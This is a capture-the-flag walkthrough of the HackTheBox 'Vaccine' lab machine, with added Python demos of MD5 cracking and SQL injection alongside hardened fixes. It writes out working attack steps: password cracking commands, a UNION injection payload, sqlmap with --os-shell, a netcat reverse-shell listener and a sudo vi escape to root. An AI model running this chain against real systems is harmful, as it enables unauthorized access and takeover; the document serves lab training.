HackTheBox: Vaccine Room

Vaccine is an Easy-level machine on the HackTheBox platform, part of its Starting Point series, designed to introduce participants to the basics of web application security, exploitation, and privilege escalation. It is a good starting point for beginners who want to practise penetration testing and see common web vulnerabilities chained together in a controlled environment: an exposed backup, weak password hashing, SQL injection and a sudo misconfiguration.
Objectives
The main objectives of the Vaccine room are:
1. Identify and exploit vulnerabilities in a web application.
2. Gain initial foothold through web exploitation techniques.
3. Escalate privileges to root access by analyzing misconfigurations or vulnerabilities in the system.
Tools and Techniques
Participants may use a variety of tools to complete this room, including:
- Reconnaissance tools: nmap, gobuster, dirb.
- Exploitation tools: Burp Suite, Metasploit (if needed), or manual payload crafting.
- Post-exploitation tools: linpeas, pspy, or custom scripts for local privilege escalation.
The following techniques are required:
- Web application vulnerability analysis.
- Exploiting common misconfigurations.
- Utilizing tools for enumeration and exploitation.
- Privilege escalation techniques.
Walkthrough
Reconnaissance & Enumeration
The first step is scanning the target with nmap, using version detection together with the default script set so that anonymous FTP is flagged automatically:
nmap -sV -sC <target-ip>
Open ports: FTP (21), SSH (22), and HTTP (80).
- FTP: anonymous login allowed.
- HTTP: Apache HTTPD.
By identifying open services, we determine possible attack vectors; anonymous FTP is the obvious place to start.
Exploitation
Using the FTP service with the anonymous login, we retrieve a file named backup.zip.
ftp <target-ip>
Username: anonymous
Password: (any)
ftp> get backup.zip
The ZIP file is password-protected. We use zip2john to generate a hash and John the Ripper to crack it.
Convert the ZIP to a crackable hash:
zip2john backup.zip > backup.hash
Crack the hash using rockyou.txt:
john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Password found: 741852963
Extract files:
unzip backup.zip
Inside the ZIP, we find a PHP file (index.php). Analyzing its code reveals an MD5 hash used for login validation.
if ($username === "admin" && md5($password) === "<md5_hash>")
The hash is unsalted MD5 (hashcat mode 0), so a wordlist attack is quick. Hashcat, or an online lookup such as CrackStation, recovers the plaintext:
hashcat -m 0 <md5_hash> /usr/share/wordlists/rockyou.txt
Password found: qwerty789
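What hashcat does here, in miniature, as an added example that is not code from the original page or from the machine itself: every candidate is hashed with MD5 and compared against the target, which works because the check in index.php uses unsalted, single-round MD5. The target hash is derived from the password the walkthrough reports rather than copied from the machine, and the wordlist is a constructed stand-in for rockyou.txt. The hardened helpers (hash_password, verify_password, names assumed here) show the salted, iterated alternative that makes the same wordlist attack expensive.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

# Constructed fixture: the page shows a login check of the form
#   md5($password) === "<md5_hash>"
# The target is computed from the password the walkthrough recovers, so the
# example runs without reproducing the machine's own index.php.
TARGET_HASH = hashlib.md5(b"qwerty789").hexdigest()

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "qwerty", "741852963", "qwerty789", "letmein"]


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 matches target_hex, else None.

    This is `hashcat -m 0` at toy scale: unsalted MD5 is so cheap that every
    candidate can simply be hashed and compared.
    """
    target_hex = target_hex.strip().lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None


# Hardened form (hypothetical helper names): a per-user random salt and an
# iterated KDF, so each guess costs PBKDF2_ROUNDS hash operations and a
# cracked hash does not transfer to other users with the same password.
PBKDF2_ROUNDS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    # Constant-time comparison; `===` on hex strings leaks timing.
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    print("recovered from MD5:", crack_md5(TARGET_HASH, WORDLIST))
    salt, digest = hash_password("qwerty789")
    print("PBKDF2 verify:", verify_password("qwerty789", salt, digest))
    print("PBKDF2 wrong password:", verify_password("qwerty788", salt, digest))
```

The comparison is the point: the MD5 loop finishes instantly, while each PBKDF2 guess costs hundreds of thousands of SHA-256 operations and the salt forces the attacker to redo that work per user.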
After logging in with admin:qwerty789, the dashboard's search field is vulnerable to SQL injection. Submitting a single quote (') returns a database error, confirming that the input reaches the query unescaped. SQLMap automates the rest; because the search page sits behind the login, pass the session cookie from the authenticated browser, otherwise every request is redirected back to the login form and sqlmap reports the parameter as not injectable:
sqlmap -u "http://vaccine.htb/?search=test" --cookie="PHPSESSID=<session-id>" --dbs
Outcome: databases enumerated and their contents dumped.
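The mechanics behind the single-quote probe and the data extraction, as an added example that is not code from the original page or from the machine: a constructed in-memory SQLite database (table and column names are hypothetical) stands in for the application's backend, search_vulnerable builds the query by string concatenation the way the injectable page does, and search_safe is the parameterised fix. Command execution via sqlmap's --os-shell depends on backend features SQLite does not offer and is not reproduced here.

```python
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed fixture: a product catalogue plus the table an attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, category TEXT);
        INSERT INTO products VALUES ('Elixir', 'supplement'), ('Sanitizer', 'hygiene');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'qwerty789');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    """The search parameter is spliced straight into the SQL text."""
    sql = f"SELECT name, category FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple[str, str]]:
    """Parameterised form: the term is bound as data and never parsed as SQL."""
    sql = "SELECT name, category FROM products WHERE name LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def probe_single_quote(conn: sqlite3.Connection) -> bool:
    """The manual check from the walkthrough: does a lone quote break the query?

    A syntax error (rather than 'no results') tells the tester that the quote
    was parsed as SQL, which is exactly what sqlmap then exploits.
    """
    try:
        search_vulnerable(conn, "'")
    except sqlite3.OperationalError:
        return True
    return False


# Closes the LIKE string, appends a UNION with the same column count, and
# comments out the trailing "%'" the application adds after the term.
UNION_PAYLOAD = "xyz' UNION SELECT username, password FROM users--"


if __name__ == "__main__":
    db = build_db()
    print("quote breaks query:", probe_single_quote(db))
    print("vulnerable search with UNION payload:", search_vulnerable(db, UNION_PAYLOAD))
    print("parameterised search with same payload:", search_safe(db, UNION_PAYLOAD))
```

Note the column-count requirement in the payload: the UNION must return as many columns as the original SELECT, which is why sqlmap spends its first requests counting columns before it dumps anything.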
Post-Exploitation
Because the search parameter is injectable and the backend database accepts stacked queries, sqlmap's --os-shell option turns the injection into command execution as the database service account:
sqlmap -u "http://vaccine.htb/?search=test" --cookie="PHPSESSID=<session-id>" --os-shell
Generate a reverse shell one-liner with a helper such as [revshells.com] and start a listener on the attacking host:
nc -nlvp 1337
Run the one-liner from the os-shell prompt to catch the connection. Upgrade the shell to a proper tty before continuing (for example python3 -c 'import pty; pty.spawn("/bin/bash")'), because sudo will need to prompt for a password later.
Privilege Escalation
Search for misconfigurations and sensitive files, for example SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Analyze sudo permissions. sudo -l asks for the current user's password; if the shell runs as the database service account, that password is usually sitting in the web application's database connection code, so read the PHP sources first:
sudo -l
Key finding: vi can be run as root, but only with the exact arguments that sudo -l lists. Invoke it character for character as shown, since sudo matches the whole command line and rejects anything else.
Refer to [GTFOBins] for escape techniques; vi can shell out directly, and when run under sudo the child process inherits root.
Launch vi as root on the permitted file:
sudo vi <file listed by sudo -l>
Escape to a root shell:
:! /bin/bash
If :! is not available, the equivalent is :set shell=/bin/bash followed by :shell.
Verify root access and retrieve the flag:
whoami
cat /root/root.txt
Conclusion
The Vaccine machine demonstrates essential techniques for penetration testing:
- Service enumeration.
- Password cracking with John the Ripper (ZIP) and Hashcat (unsalted MD5).
- SQL injection exploitation with SQLMap.
- Privilege escalation using sudo misconfigurations and GTFOBins.
These skills are foundational for understanding system vulnerabilities and exploitation methods.